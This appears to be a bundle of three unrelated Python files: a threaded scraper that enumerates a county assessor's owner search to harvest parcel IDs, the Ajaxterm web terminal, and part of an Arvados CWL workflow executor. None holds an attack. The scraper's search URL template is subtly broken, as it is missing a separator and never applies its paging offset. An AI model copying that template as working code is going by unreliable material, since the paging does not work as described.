parcel_id_extractor.py
|
# -*- coding: utf-8 -*-
import os
import threading
from queue import Queue
from string import ascii_uppercase, digits
import requests
from bs4 import BeautifulSoup
SEARCH_URL = "https://qpublic.schneidercorp.com/Application.aspx?AppID=979&LayerID=19792&PageTypeID=2&PageID=8661" \
"searchType=owner_name&INPUT={}"
Q = Queue()
class ParcelIdExtractor(object):
"""
Fuzzes the owner search to extract all available parcel ids
"""
def __init__(self):
self.parcel_ids = frozenset()
self.lock = threading.Lock()
def update_ids(self, ids):
"""Use a lock to prevent multiple threads from updating parcel_ids"""
self.lock.acquire()
self.parcel_ids |= frozenset(ids)
self.lock.release()
def search_all_terms(self):
"""
Puts all the search terms on a queue to be processed by worker threads.
Note: all owner names are capitalized on the assessor's site, so we
only use capitalized letters
"""
# 0-9 + A-Z
terms = [d for d in digits] + [l for l in ascii_uppercase]
[Q.put(t) for t in terms]
def search(self, search_term, begin=0):
"""
Searches by owner name, extracts the parcel ids, then recursively pages
through the results until no more ids are found for the search_term
"""
thread = threading.current_thread().getName()
url = SEARCH_URL.format(search_term, begin)
print('{} searching {}'.format(thread, url))
r = requests.get(url)
if 'No Records Found.' in r.text:
return
else:
soup = BeautifulSoup(r.text, 'html.parser')
pids = [td.a.text for td in soup.select('td.search_value')
if td.a is not None and td.a.text != 'Map It']
if len(pids) > 0:
self.update_ids(pids)
self.search(search_term, begin + len(pids))
def process_queue(self):
while not Q.empty():
term = Q.get()
self.search(term)
Q.task_done()
def main(self, file_name='parcel_ids.txt', num_worker_threads=10):
try:
# populate queue with all the search terms
self.search_all_terms()
# start worker threads to process queue
threads = []
for i in range(num_worker_threads):
t = threading.Thread(target=self.process_queue)
threads.append(t)
t.start()
# wait for all threads to complete
[t.join() for t in threads]
with open(file_name, 'w') as f:
print('writing {} parcel ids'.format(len(self.parcel_ids)))
for id in self.parcel_ids:
f.write(id + os.linesep)
except Exception as error:
print(error)
if __name__ == '__main__':
ParcelIdExtractor().main()
|
ajaxterm.py
|
#!/usr/bin/env python
""" Ajaxterm """
import array,cgi,fcntl,glob,mimetypes,optparse,os,pty,random,re,signal,select,sys,threading,time,termios,struct,pwd
os.chdir(os.path.normpath(os.path.dirname(__file__)))
# Optional: Add QWeb in sys path
sys.path[0:0]=glob.glob('../../python')
import qweb
class Terminal:
def __init__(self,width=80,height=24):
self.width=width
self.height=height
self.init()
self.reset()
def init(self):
self.esc_seq={
"\x00": None,
"\x05": self.esc_da,
"\x07": None,
"\x08": self.esc_0x08,
"\x09": self.esc_0x09,
"\x0a": self.esc_0x0a,
"\x0b": self.esc_0x0a,
"\x0c": self.esc_0x0a,
"\x0d": self.esc_0x0d,
"\x0e": None,
"\x0f": None,
"\x1b#8": None,
"\x1b=": None,
"\x1b>": None,
"\x1b(0": None,
"\x1b(A": None,
"\x1b(B": None,
"\x1b[c": self.esc_da,
"\x1b[0c": self.esc_da,
"\x1b]R": None,
"\x1b7": self.esc_save,
"\x1b8": self.esc_restore,
"\x1bD": None,
"\x1bE": None,
"\x1bH": None,
"\x1bM": self.esc_ri,
"\x1bN": None,
"\x1bO": None,
"\x1bZ": self.esc_da,
"\x1ba": None,
"\x1bc": self.reset,
"\x1bn": None,
"\x1bo": None,
}
for k,v in self.esc_seq.items():
if v==None:
self.esc_seq[k]=self.esc_ignore
# regex
d={
r'\[\??([0-9;]*)([@ABCDEFGHJKLMPXacdefghlmnqrstu`])' : self.csi_dispatch,
r'\]([^\x07]+)\x07' : self.esc_ignore,
}
self.esc_re=[]
for k,v in d.items():
self.esc_re.append((re.compile('\x1b'+k),v))
# define csi sequences
self.csi_seq={
'@': (self.csi_at,[1]),
'`': (self.csi_G,[1]),
'J': (self.csi_J,[0]),
'K': (self.csi_K,[0]),
}
for i in [i[4] for i in dir(self) if i.startswith('csi_') and len(i)==5]:
if not self.csi_seq.has_key(i):
self.csi_seq[i]=(getattr(self,'csi_'+i),[1])
# Init 0-256 to latin1 and html translation table
self.trl1=""
for i in range(256):
if i<32:
self.trl1+=" "
elif i<127 or i>160:
self.trl1+=chr(i)
else:
self.trl1+="?"
self.trhtml=""
for i in range(256):
if i==0x0a or (i>32 and i<127) or i>160:
self.trhtml+=chr(i)
elif i<=32:
self.trhtml+="\xa0"
else:
self.trhtml+="?"
def reset(self,s=""):
self.scr=array.array('i',[0x000700]*(self.width*self.height))
self.st=0
self.sb=self.height-1
self.cx_bak=self.cx=0
self.cy_bak=self.cy=0
self.cl=0
self.sgr=0x000700
self.buf=""
self.outbuf=""
self.last_html=""
def peek(self,y1,x1,y2,x2):
return self.scr[self.width*y1+x1:self.width*y2+x2]
def poke(self,y,x,s):
pos=self.width*y+x
self.scr[pos:pos+len(s)]=s
def zero(self,y1,x1,y2,x2):
w=self.width*(y2-y1)+x2-x1+1
z=array.array('i',[0x000700]*w)
self.scr[self.width*y1+x1:self.width*y2+x2+1]=z
def scroll_up(self,y1,y2):
self.poke(y1,0,self.peek(y1+1,0,y2,self.width))
self.zero(y2,0,y2,self.width-1)
def scroll_down(self,y1,y2):
self.poke(y1+1,0,self.peek(y1,0,y2-1,self.width))
self.zero(y1,0,y1,self.width-1)
def scroll_right(self,y,x):
self.poke(y,x+1,self.peek(y,x,y,self.width))
self.zero(y,x,y,x)
def cursor_down(self):
if self.cy>=self.st and self.cy<=self.sb:
self.cl=0
q,r=divmod(self.cy+1,self.sb+1)
if q:
self.scroll_up(self.st,self.sb)
self.cy=self.sb
else:
self.cy=r
def cursor_right(self):
q,r=divmod(self.cx+1,self.width)
if q:
self.cl=1
else:
self.cx=r
def echo(self,c):
if self.cl:
self.cursor_down()
self.cx=0
self.scr[(self.cy*self.width)+self.cx]=self.sgr|ord(c)
self.cursor_right()
def esc_0x08(self,s):
self.cx=max(0,self.cx-1)
def esc_0x09(self,s):
x=self.cx+8
q,r=divmod(x,8)
self.cx=(q*8)%self.width
def esc_0x0a(self,s):
self.cursor_down()
def esc_0x0d(self,s):
self.cl=0
self.cx=0
def esc_save(self,s):
self.cx_bak=self.cx
self.cy_bak=self.cy
def esc_restore(self,s):
self.cx=self.cx_bak
self.cy=self.cy_bak
self.cl=0
def esc_da(self,s):
self.outbuf="\x1b[?6c"
def esc_ri(self,s):
self.cy=max(self.st,self.cy-1)
if self.cy==self.st:
self.scroll_down(self.st,self.sb)
def esc_ignore(self,*s):
pass
# print "term:ignore: %s"%repr(s)
def csi_dispatch(self,seq,mo):
# CSI sequences
s=mo.group(1)
c=mo.group(2)
f=self.csi_seq.get(c,None)
if f:
try:
l=[min(int(i),1024) for i in s.split(';') if len(i)<4]
except ValueError:
l=[]
if len(l)==0:
l=f[1]
f[0](l)
# else:
# print 'csi ignore',c,l
def csi_at(self,l):
for i in range(l[0]):
self.scroll_right(self.cy,self.cx)
def csi_A(self,l):
self.cy=max(self.st,self.cy-l[0])
def csi_B(self,l):
self.cy=min(self.sb,self.cy+l[0])
def csi_C(self,l):
self.cx=min(self.width-1,self.cx+l[0])
self.cl=0
def csi_D(self,l):
self.cx=max(0,self.cx-l[0])
self.cl=0
def csi_E(self,l):
self.csi_B(l)
self.cx=0
self.cl=0
def csi_F(self,l):
self.csi_A(l)
self.cx=0
self.cl=0
def csi_G(self,l):
self.cx=min(self.width,l[0])-1
def csi_H(self,l):
if len(l)<2: l=[1,1]
self.cx=min(self.width,l[1])-1
self.cy=min(self.height,l[0])-1
self.cl=0
def csi_J(self,l):
if l[0]==0:
self.zero(self.cy,self.cx,self.height-1,self.width-1)
elif l[0]==1:
self.zero(0,0,self.cy,self.cx)
elif l[0]==2:
self.zero(0,0,self.height-1,self.width-1)
def csi_K(self,l):
if l[0]==0:
self.zero(self.cy,self.cx,self.cy,self.width-1)
elif l[0]==1:
self.zero(self.cy,0,self.cy,self.cx)
elif l[0]==2:
self.zero(self.cy,0,self.cy,self.width-1)
def csi_L(self,l):
for i in range(l[0]):
if self.cy<self.sb:
self.scroll_down(self.cy,self.sb)
def csi_M(self,l):
if self.cy>=self.st and self.cy<=self.sb:
for i in range(l[0]):
self.scroll_up(self.cy,self.sb)
def csi_P(self,l):
w,cx,cy=self.width,self.cx,self.cy
end=self.peek(cy,cx,cy,w)
self.csi_K([0])
self.poke(cy,cx,end[l[0]:])
def csi_X(self,l):
self.zero(self.cy,self.cx,self.cy,self.cx+l[0])
def csi_a(self,l):
self.csi_C(l)
def csi_c(self,l):
#'\x1b[?0c' 0-8 cursor size
pass
def csi_d(self,l):
self.cy=min(self.height,l[0])-1
def csi_e(self,l):
self.csi_B(l)
def csi_f(self,l):
self.csi_H(l)
def csi_h(self,l):
if l[0]==4:
pass
# print "insert on"
def csi_l(self,l):
if l[0]==4:
pass
# print "insert off"
def csi_m(self,l):
for i in l:
if i==0 or i==39 or i==49 or i==27:
self.sgr=0x000700
elif i==1:
self.sgr=(self.sgr|0x000800)
elif i==7:
self.sgr=0x070000
elif i>=30 and i<=37:
c=i-30
self.sgr=(self.sgr&0xff08ff)|(c<<8)
elif i>=40 and i<=47:
c=i-40
self.sgr=(self.sgr&0x00ffff)|(c<<16)
# else:
# print "CSI sgr ignore",l,i
# print 'sgr: %r %x'%(l,self.sgr)
def csi_r(self,l):
if len(l)<2: l=[0,self.height]
self.st=min(self.height-1,l[0]-1)
self.sb=min(self.height-1,l[1]-1)
self.sb=max(self.st,self.sb)
def csi_s(self,l):
self.esc_save(0)
def csi_u(self,l):
self.esc_restore(0)
def escape(self):
e=self.buf
if len(e)>32:
# print "error %r"%e
self.buf=""
elif e in self.esc_seq:
self.esc_seq[e](e)
self.buf=""
else:
for r,f in self.esc_re:
mo=r.match(e)
if mo:
f(e,mo)
self.buf=""
break
# if self.buf=='': print "ESC %r\n"%e
def write(self,s):
for i in s:
if len(self.buf) or (i in self.esc_seq):
self.buf+=i
self.escape()
elif i == '\x1b':
self.buf+=i
else:
self.echo(i)
def read(self):
b=self.outbuf
self.outbuf=""
return b
def dump(self):
r=''
for i in self.scr:
r+=chr(i&255)
return r
def dumplatin1(self):
return self.dump().translate(self.trl1)
def dumphtml(self,color=1):
h=self.height
w=self.width
r=""
span=""
span_bg,span_fg=-1,-1
for i in range(h*w):
q,c=divmod(self.scr[i],256)
if color:
bg,fg=divmod(q,256)
else:
bg,fg=0,7
if i==self.cy*w+self.cx:
bg,fg=1,7
if (bg!=span_bg or fg!=span_fg or i==h*w-1):
if len(span):
r+='<span class="f%d b%d">%s</span>'%(span_fg,span_bg,cgi.escape(span.translate(self.trhtml)))
span=""
span_bg,span_fg=bg,fg
span+=chr(c)
if i%w==w-1:
span+='\n'
r='<?xml version="1.0" encoding="ISO-8859-1"?><pre class="term">%s</pre>'%r
if self.last_html==r:
return '<?xml version="1.0"?><idem></idem>'
else:
self.last_html=r
# print self
return r
def __repr__(self):
d=self.dumplatin1()
r=""
for i in range(self.height):
r+="|%s|\n"%d[self.width*i:self.width*(i+1)]
return r
class SynchronizedMethod:
def __init__(self,lock,orig):
self.lock=lock
self.orig=orig
def __call__(self,*l):
self.lock.acquire()
r=self.orig(*l)
self.lock.release()
return r
class Multiplex:
def __init__(self,cmd=None):
signal.signal(signal.SIGCHLD, signal.SIG_IGN)
self.cmd=cmd
self.proc={}
self.lock=threading.RLock()
self.thread=threading.Thread(target=self.loop)
self.alive=1
# synchronize methods
for name in ['create','fds','proc_read','proc_write','dump','die','run']:
orig=getattr(self,name)
setattr(self,name,SynchronizedMethod(self.lock,orig))
self.thread.start()
def create(self,w=80,h=25):
pid,fd=pty.fork()
if pid==0:
try:
fdl=[int(i) for i in os.listdir('/proc/self/fd')]
except OSError:
fdl=range(256)
for i in [i for i in fdl if i>2]:
try:
os.close(i)
except OSError:
pass
if self.cmd:
cmd=['/bin/sh','-c',self.cmd]
elif os.getuid()==0:
cmd=['/bin/login']
else:
sys.stdout.write("Login: ")
login=sys.stdin.readline().strip()
if re.match('^[0-9A-Za-z-_. ]+$',login):
cmd=['ssh']
cmd+=['-oPreferredAuthentications=keyboard-interactive,password']
cmd+=['-oNoHostAuthenticationForLocalhost=yes']
cmd+=['-oLogLevel=FATAL']
cmd+=['-F/dev/null','-l',login,'localhost']
else:
os._exit(0)
env={}
env["COLUMNS"]=str(w)
env["LINES"]=str(h)
env["TERM"]="linux"
env["PATH"]=os.environ['PATH']
os.execvpe(cmd[0],cmd,env)
else:
fcntl.fcntl(fd, fcntl.F_SETFL, os.O_NONBLOCK)
# python bug http://python.org/sf/1112949 on amd64
fcntl.ioctl(fd, struct.unpack('i',struct.pack('I',termios.TIOCSWINSZ))[0], struct.pack("HHHH",h,w,0,0))
self.proc[fd]={'pid':pid,'term':Terminal(w,h),'buf':'','time':time.time()}
return fd
def die(self):
self.alive=0
def run(self):
return self.alive
def fds(self):
return self.proc.keys()
def proc_kill(self,fd):
if fd in self.proc:
self.proc[fd]['time']=0
t=time.time()
for i in self.proc.keys():
t0=self.proc[i]['time']
if (t-t0)>120:
try:
os.close(i)
os.kill(self.proc[i]['pid'],signal.SIGTERM)
except (IOError,OSError):
pass
del self.proc[i]
def proc_read(self,fd):
try:
t=self.proc[fd]['term']
t.write(os.read(fd,65536))
reply=t.read()
if reply:
os.write(fd,reply)
self.proc[fd]['time']=time.time()
except (KeyError,IOError,OSError):
self.proc_kill(fd)
def proc_write(self,fd,s):
try:
os.write(fd,s)
except (IOError,OSError):
self.proc_kill(fd)
def dump(self,fd,color=1):
try:
return self.proc[fd]['term'].dumphtml(color)
except KeyError:
return False
def loop(self):
while self.run():
fds=self.fds()
i,o,e=select.select(fds, [], [], 1.0)
for fd in i:
self.proc_read(fd)
if len(i):
time.sleep(0.002)
for i in self.proc.keys():
try:
os.close(i)
os.kill(self.proc[i]['pid'],signal.SIGTERM)
except (IOError,OSError):
pass
class AjaxTerm:
def __init__(self,cmd=None,index_file='ajaxterm.html'):
self.files={}
for i in ['css','html','js']:
for j in glob.glob('*.%s'%i):
self.files[j]=file(j).read()
self.files['index']=file(index_file).read()
self.mime = mimetypes.types_map.copy()
self.mime['.html']= 'text/html; charset=UTF-8'
self.multi = Multiplex(cmd)
self.session = {}
def __call__(self, environ, start_response):
req = qweb.QWebRequest(environ, start_response,session=None)
if req.PATH_INFO.endswith('/u'):
s=req.REQUEST["s"]
k=req.REQUEST["k"]
c=req.REQUEST["c"]
w=req.REQUEST.int("w")
h=req.REQUEST.int("h")
if s in self.session:
term=self.session[s]
else:
if not (w>2 and w<256 and h>2 and h<100):
w,h=80,25
term=self.session[s]=self.multi.create(w,h)
if k:
self.multi.proc_write(term,k)
time.sleep(0.002)
dump=self.multi.dump(term,c)
req.response_headers['Content-Type']='text/xml'
if isinstance(dump,str):
req.write(dump)
req.response_gzencode=1
else:
del self.session[s]
req.write('<?xml version="1.0"?><idem></idem>')
# print "sessions %r"%self.session
else:
n=os.path.basename(req.PATH_INFO)
if n in self.files:
req.response_headers['Content-Type'] = self.mime.get(os.path.splitext(n)[1].lower(), 'application/octet-stream')
req.write(self.files[n])
else:
req.response_headers['Content-Type'] = 'text/html; charset=UTF-8'
req.write(self.files['index'])
return req
def main():
parser = optparse.OptionParser()
parser.add_option("-p", "--port", dest="port", default="8022", help="Set the TCP port (default: 8022)")
parser.add_option("-c", "--command", dest="cmd", default=None,help="set the command (default: /bin/login or ssh localhost)")
parser.add_option("-l", "--log", action="store_true", dest="log",default=0,help="log requests to stderr (default: quiet mode)")
parser.add_option("-d", "--daemon", action="store_true", dest="daemon", default=0, help="run as daemon in the background")
parser.add_option("-P", "--pidfile",dest="pidfile",default="/var/run/ajaxterm.pid",help="set the pidfile (default: /var/run/ajaxterm.pid)")
parser.add_option("-i", "--index", dest="index_file", default="ajaxterm.html",help="default index file (default: ajaxterm.html)")
parser.add_option("-u", "--uid", dest="uid", help="Set the daemon's user id")
(o, a) = parser.parse_args()
if o.daemon:
pid=os.fork()
if pid == 0:
#os.setsid() ?
os.setpgrp()
nullin = file('/dev/null', 'r')
nullout = file('/dev/null', 'w')
os.dup2(nullin.fileno(), sys.stdin.fileno())
os.dup2(nullout.fileno(), sys.stdout.fileno())
os.dup2(nullout.fileno(), sys.stderr.fileno())
if os.getuid()==0 and o.uid:
try:
os.setuid(int(o.uid))
except:
os.setuid(pwd.getpwnam(o.uid).pw_uid)
else:
try:
file(o.pidfile,'w+').write(str(pid)+'\n')
except:
pass
print 'AjaxTerm at http://localhost:%s/ pid: %d' % (o.port,pid)
sys.exit(0)
else:
print 'AjaxTerm at http://localhost:%s/' % o.port
at=AjaxTerm(o.cmd,o.index_file)
# f=lambda:os.system('firefox http://localhost:%s/&'%o.port)
# qweb.qweb_wsgi_autorun(at,ip='localhost',port=int(o.port),threaded=0,log=o.log,callback_ready=None)
try:
qweb.QWebWSGIServer(at,ip='localhost',port=int(o.port),threaded=0,log=o.log).serve_forever()
except KeyboardInterrupt,e:
sys.excepthook(*sys.exc_info())
at.multi.die()
if __name__ == '__main__':
main()
|
executor.py
|
# Copyright (C) The Arvados Authors. All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
from __future__ import division
from builtins import next
from builtins import object
from builtins import str
from future.utils import viewvalues, viewitems
import argparse
import logging
import os
import sys
import threading
import copy
import json
import re
from functools import partial
import time
import urllib
from cwltool.errors import WorkflowException
import cwltool.workflow
from schema_salad.sourceline import SourceLine
import schema_salad.validate as validate
import arvados
import arvados.config
from arvados.keep import KeepClient
from arvados.errors import ApiError
import arvados_cwl.util
from .arvcontainer import RunnerContainer
from .runner import Runner, upload_docker, upload_job_order, upload_workflow_deps, make_builder
from .arvtool import ArvadosCommandTool, validate_cluster_target, ArvadosExpressionTool
from .arvworkflow import ArvadosWorkflow, upload_workflow
from .fsaccess import CollectionFsAccess, CollectionFetcher, collectionResolver, CollectionCache, pdh_size
from .perf import Perf
from .pathmapper import NoFollowPathMapper
from cwltool.task_queue import TaskQueue
from .context import ArvLoadingContext, ArvRuntimeContext
from ._version import __version__
from cwltool.process import shortname, UnsupportedRequirement, use_custom_schema
from cwltool.utils import adjustFileObjs, adjustDirObjs, get_listing, visit_class, aslist
from cwltool.command_line_tool import compute_checksums
from cwltool.load_tool import load_tool
logger = logging.getLogger('arvados.cwl-runner')
metrics = logging.getLogger('arvados.cwl-runner.metrics')
DEFAULT_PRIORITY = 500
class RuntimeStatusLoggingHandler(logging.Handler):
"""
Intercepts logging calls and report them as runtime statuses on runner
containers.
"""
def __init__(self, runtime_status_update_func):
super(RuntimeStatusLoggingHandler, self).__init__()
self.runtime_status_update = runtime_status_update_func
self.updatingRuntimeStatus = False
def emit(self, record):
kind = None
if record.levelno >= logging.ERROR:
kind = 'error'
elif record.levelno >= logging.WARNING:
kind = 'warning'
if kind is not None and self.updatingRuntimeStatus is not True:
self.updatingRuntimeStatus = True
try:
log_msg = record.getMessage()
if '\n' in log_msg:
# If the logged message is multi-line, use its first line as status
# and the rest as detail.
status, detail = log_msg.split('\n', 1)
self.runtime_status_update(
kind,
"%s: %s" % (record.name, status),
detail
)
else:
self.runtime_status_update(
kind,
"%s: %s" % (record.name, record.getMessage())
)
finally:
self.updatingRuntimeStatus = False
class ArvCwlExecutor(object):
"""Execute a CWL tool or workflow, submit work (using containers API),
wait for them to complete, and report output.
"""
def __init__(self, api_client,
arvargs=None,
keep_client=None,
num_retries=4,
thread_count=4,
stdout=sys.stdout):
if arvargs is None:
arvargs = argparse.Namespace()
arvargs.work_api = None
arvargs.output_name = None
arvargs.output_tags = None
arvargs.thread_count = 1
arvargs.collection_cache_size = None
self.api = api_client
self.processes = {}
self.workflow_eval_lock = threading.Condition(threading.RLock())
self.final_output = None
self.final_status = None
self.num_retries = num_retries
self.uuid = None
self.stop_polling = threading.Event()
self.poll_api = None
self.pipeline = None
self.final_output_collection = None
self.output_name = arvargs.output_name
self.output_tags = arvargs.output_tags
self.project_uuid = None
self.intermediate_output_ttl = 0
self.intermediate_output_collections = []
self.trash_intermediate = False
self.thread_count = arvargs.thread_count
self.poll_interval = 12
self.loadingContext = None
self.should_estimate_cache_size = True
self.fs_access = None
self.secret_store = None
self.stdout = stdout
if keep_client is not None:
self.keep_client = keep_client
else:
self.keep_client = arvados.keep.KeepClient(api_client=self.api, num_retries=self.num_retries)
if arvargs.collection_cache_size:
collection_cache_size = arvargs.collection_cache_size*1024*1024
self.should_estimate_cache_size = False
else:
collection_cache_size = 256*1024*1024
self.collection_cache = CollectionCache(self.api, self.keep_client, self.num_retries,
cap=collection_cache_size)
self.fetcher_constructor = partial(CollectionFetcher,
api_client=self.api,
fs_access=CollectionFsAccess("", collection_cache=self.collection_cache),
num_retries=self.num_retries)
self.work_api = None
expected_api = ["containers"]
for api in expected_api:
try:
methods = self.api._rootDesc.get('resources')[api]['methods']
if ('httpMethod' in methods['create'] and
(arvargs.work_api == api or arvargs.work_api is None)):
self.work_api = api
break
except KeyError:
pass
if not self.work_api:
if arvargs.work_api is None:
raise Exception("No supported APIs")
else:
raise Exception("Unsupported API '%s', expected one of %s" % (arvargs.work_api, expected_api))
if self.work_api == "jobs":
logger.error("""
*******************************
The 'jobs' API is no longer supported.
*******************************""")
exit(1)
self.loadingContext = ArvLoadingContext(vars(arvargs))
self.loadingContext.fetcher_constructor = self.fetcher_constructor
self.loadingContext.resolver = partial(collectionResolver, self.api, num_retries=self.num_retries)
self.loadingContext.construct_tool_object = self.arv_make_tool
# Add a custom logging handler to the root logger for runtime status reporting
# if running inside a container
if arvados_cwl.util.get_current_container(self.api, self.num_retries, logger):
root_logger = logging.getLogger('')
# Remove existing RuntimeStatusLoggingHandlers if they exist
handlers = [h for h in root_logger.handlers if not isinstance(h, RuntimeStatusLoggingHandler)]
root_logger.handlers = handlers
handler = RuntimeStatusLoggingHandler(self.runtime_status_update)
root_logger.addHandler(handler)
self.toplevel_runtimeContext = ArvRuntimeContext(vars(arvargs))
self.toplevel_runtimeContext.make_fs_access = partial(CollectionFsAccess,
collection_cache=self.collection_cache)
validate_cluster_target(self, self.toplevel_runtimeContext)
def arv_make_tool(self, toolpath_object, loadingContext):
if "class" in toolpath_object and toolpath_object["class"] == "CommandLineTool":
return ArvadosCommandTool(self, toolpath_object, loadingContext)
elif "class" in toolpath_object and toolpath_object["class"] == "Workflow":
return ArvadosWorkflow(self, toolpath_object, loadingContext)
elif "class" in toolpath_object and toolpath_object["class"] == "ExpressionTool":
return ArvadosExpressionTool(self, toolpath_object, loadingContext)
else:
raise Exception("Unknown tool %s" % toolpath_object.get("class"))
def output_callback(self, out, processStatus):
with self.workflow_eval_lock:
if processStatus == "success":
logger.info("Overall process status is %s", processStatus)
state = "Complete"
else:
logger.error("Overall process status is %s", processStatus)
state = "Failed"
if self.pipeline:
self.api.pipeline_instances().update(uuid=self.pipeline["uuid"],
body={"state": state}).execute(num_retries=self.num_retries)
self.final_status = processStatus
self.final_output = out
self.workflow_eval_lock.notifyAll()
def start_run(self, runnable, runtimeContext):
self.task_queue.add(partial(runnable.run, runtimeContext),
self.workflow_eval_lock, self.stop_polling)
def process_submitted(self, container):
with self.workflow_eval_lock:
self.processes[container.uuid] = container
def process_done(self, uuid, record):
with self.workflow_eval_lock:
j = self.processes[uuid]
logger.info("%s %s is %s", self.label(j), uuid, record["state"])
self.task_queue.add(partial(j.done, record),
self.workflow_eval_lock, self.stop_polling)
del self.processes[uuid]
def runtime_status_update(self, kind, message, detail=None):
"""
Updates the runtime_status field on the runner container.
Called when there's a need to report errors, warnings or just
activity statuses, for example in the RuntimeStatusLoggingHandler.
"""
with self.workflow_eval_lock:
current = None
try:
current = arvados_cwl.util.get_current_container(self.api, self.num_retries, logger)
except Exception as e:
logger.info("Couldn't get current container: %s", e)
if current is None:
return
runtime_status = current.get('runtime_status', {})
if kind in ('error', 'warning'):
updatemessage = runtime_status.get(kind, "")
if not updatemessage:
updatemessage = message
# Subsequent messages tacked on in detail
updatedetail = runtime_status.get(kind+'Detail', "")
maxlines = 40
if updatedetail.count("\n") < maxlines:
if updatedetail:
updatedetail += "\n"
updatedetail += message + "\n"
if detail:
updatedetail += detail + "\n"
if updatedetail.count("\n") >= maxlines:
updatedetail += "\nSome messages may have been omitted. Check the full log."
runtime_status.update({
kind: updatemessage,
kind+'Detail': updatedetail,
})
else:
# Ignore any other status kind
return
try:
self.api.containers().update(uuid=current['uuid'],
body={
'runtime_status': runtime_status,
}).execute(num_retries=self.num_retries)
except Exception as e:
logger.info("Couldn't update runtime_status: %s", e)
def wrapped_callback(self, cb, obj, st):
with self.workflow_eval_lock:
cb(obj, st)
self.workflow_eval_lock.notifyAll()
def get_wrapped_callback(self, cb):
return partial(self.wrapped_callback, cb)
def on_message(self, event):
if event.get("object_uuid") in self.processes and event["event_type"] == "update":
uuid = event["object_uuid"]
if event["properties"]["new_attributes"]["state"] == "Running":
with self.workflow_eval_lock:
j = self.processes[uuid]
if j.running is False:
j.running = True
j.update_pipeline_component(event["properties"]["new_attributes"])
logger.info("%s %s is Running", self.label(j), uuid)
elif event["properties"]["new_attributes"]["state"] in ("Complete", "Failed", "Cancelled", "Final"):
self.process_done(uuid, event["properties"]["new_attributes"])
def label(self, obj):
return "[%s %s]" % (self.work_api[0:-1], obj.name)
def poll_states(self):
"""Poll status of containers listed in the processes dict.
Runs in a separate thread.
"""
try:
remain_wait = self.poll_interval
while True:
if remain_wait > 0:
self.stop_polling.wait(remain_wait)
if self.stop_polling.is_set():
break
with self.workflow_eval_lock:
keys = list(self.processes)
if not keys:
remain_wait = self.poll_interval
continue
begin_poll = time.time()
if self.work_api == "containers":
table = self.poll_api.container_requests()
pageSize = self.poll_api._rootDesc.get('maxItemsPerResponse', 1000)
while keys:
page = keys[:pageSize]
try:
proc_states = table.list(filters=[["uuid", "in", page]]).execute(num_retries=self.num_retries)
except Exception:
logger.exception("Error checking states on API server: %s")
remain_wait = self.poll_interval
continue
for p in proc_states["items"]:
self.on_message({
"object_uuid": p["uuid"],
"event_type": "update",
"properties": {
"new_attributes": p
}
})
keys = keys[pageSize:]
finish_poll = time.time()
remain_wait = self.poll_interval - (finish_poll - begin_poll)
except:
logger.exception("Fatal error in state polling thread.")
with self.workflow_eval_lock:
self.processes.clear()
self.workflow_eval_lock.notifyAll()
finally:
self.stop_polling.set()
def add_intermediate_output(self, uuid):
if uuid:
self.intermediate_output_collections.append(uuid)
def trash_intermediate_output(self):
logger.info("Cleaning up intermediate output collections")
for i in self.intermediate_output_collections:
try:
self.api.collections().delete(uuid=i).execute(num_retries=self.num_retries)
except Exception:
logger.warning("Failed to delete intermediate output: %s", sys.exc_info()[1], exc_info=(sys.exc_info()[1] if self.debug else False))
except (KeyboardInterrupt, SystemExit):
break
def check_features(self, obj, parentfield=""):
if isinstance(obj, dict):
if obj.get("class") == "DockerRequirement":
if obj.get("dockerOutputDirectory"):
if not obj.get("dockerOutputDirectory").startswith('/'):
raise SourceLine(obj, "dockerOutputDirectory", validate.ValidationException).makeError(
"Option 'dockerOutputDirectory' must be an absolute path.")
if obj.get("class") == "InplaceUpdateRequirement":
if obj["inplaceUpdate"] and parentfield == "requirements":
raise SourceLine(obj, "class", UnsupportedRequirement).makeError("InplaceUpdateRequirement not supported for keep collections.")
for k,v in viewitems(obj):
self.check_features(v, parentfield=k)
elif isinstance(obj, list):
for i,v in enumerate(obj):
with SourceLine(obj, i, UnsupportedRequirement, logger.isEnabledFor(logging.DEBUG)):
self.check_features(v, parentfield=parentfield)
def make_output_collection(self, name, storage_classes, tagsString, output_properties, outputObj):
outputObj = copy.deepcopy(outputObj)
files = []
def capture(fileobj):
files.append(fileobj)
adjustDirObjs(outputObj, capture)
adjustFileObjs(outputObj, capture)
generatemapper = NoFollowPathMapper(files, "", "", separateDirs=False)
final = arvados.collection.Collection(api_client=self.api,
keep_client=self.keep_client,
num_retries=self.num_retries)
for k,v in generatemapper.items():
if v.type == "Directory" and v.resolved.startswith("_:"):
continue
if v.type == "CreateFile" and (k.startswith("_:") or v.resolved.startswith("_:")):
with final.open(v.target, "wb") as f:
f.write(v.resolved.encode("utf-8"))
continue
if not v.resolved.startswith("keep:"):
raise Exception("Output source is not in keep or a literal")
sp = v.resolved.split("/")
srccollection = sp[0][5:]
try:
reader = self.collection_cache.get(srccollection)
srcpath = urllib.parse.unquote("/".join(sp[1:]) if len(sp) > 1 else ".")
final.copy(srcpath, v.target, source_collection=reader, overwrite=False)
except arvados.errors.ArgumentError as e:
logger.error("Creating CollectionReader for '%s' '%s': %s", k, v, e)
raise
except IOError as e:
logger.error("While preparing output collection: %s", e)
raise
def rewrite(fileobj):
fileobj["location"] = generatemapper.mapper(fileobj["location"]).target
for k in ("listing", "contents", "nameext", "nameroot", "dirname"):
if k in fileobj:
del fileobj[k]
adjustDirObjs(outputObj, rewrite)
adjustFileObjs(outputObj, rewrite)
with final.open("cwl.output.json", "w") as f:
res = str(json.dumps(outputObj, sort_keys=True, indent=4, separators=(',',': '), ensure_ascii=False))
f.write(res)
final.save_new(name=name, owner_uuid=self.project_uuid, storage_classes=storage_classes,
ensure_unique_name=True, properties=output_properties)
logger.info("Final output collection %s \"%s\" (%s)", final.portable_data_hash(),
final.api_response()["name"],
final.manifest_locator())
final_uuid = final.manifest_locator()
tags = tagsString.split(',')
for tag in tags:
self.api.links().create(body={
"head_uuid": final_uuid, "link_class": "tag", "name": tag
}).execute(num_retries=self.num_retries)
def finalcollection(fileobj):
fileobj["location"] = "keep:%s/%s" % (final.portable_data_hash(), fileobj["location"])
adjustDirObjs(outputObj, finalcollection)
adjustFileObjs(outputObj, finalcollection)
return (outputObj, final)
def set_crunch_output(self):
if self.work_api == "containers":
current = arvados_cwl.util.get_current_container(self.api, self.num_retries, logger)
if current is None:
return
try:
self.api.containers().update(uuid=current['uuid'],
body={
'output': self.final_output_collection.portable_data_hash(),
'output_properties': self.final_output_collection.get_properties(),
}).execute(num_retries=self.num_retries)
